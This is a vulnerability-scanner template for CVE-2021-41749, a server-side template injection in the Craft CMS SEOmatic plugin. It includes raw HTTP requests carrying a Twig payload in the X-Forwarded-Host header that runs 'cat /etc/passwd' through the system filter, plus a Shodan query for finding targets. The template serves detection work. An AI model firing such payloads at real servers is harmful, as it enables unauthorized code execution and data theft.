id: CVE-2021-41749 info: name: CraftCMS SEOmatic - Server-Side Template Injection author: iamnoooob,ritikchaddha severity: critical description: | In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution. reference: - https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d - https://nvd.nist.gov/vuln/detail/CVE-2021-41749 - https://github.com/nystudio107/craft-seomatic/blob/develop/CHANGELOG.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-41749 cwe-id: CWE-94 epss-score: 0.2727 epss-percentile: 0.96257 cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:* metadata: verified: true max-request: 2 vendor: nystudio107 product: seomatic framework: craft_cms shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"' tags: cve,cve2021,craftcms,cms,ssti variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" result: "{{to_number(num1)*to_number(num2)}}" marker: "{{randstr}}" http: - raw: - |+ GET / HTTP/1.1 Host: {{Hostname}} X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}} Cache-Control: max-age=0 - |+ GET / HTTP/1.1 Host: {{Hostname}} X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb Cache-Control: max-age=0 skip-variables-check: true stop-at-first-match: true redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'contains(body_1, "/{{marker}}{{result}}") || regex("root:.*:0:0:", body_2)' - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")' - 'status_code == 200' condition: and # digest: 490a00463044022000f351375de5748afd0411ed918f47e554fb889c1f7dfebc63e3c45f252dffd602202b98ccef17bab42d2c5c6287e0fc2d5bcb88625e95ccf0ef2b7843740a172333:922c64590222798bb761d5b6d8e72950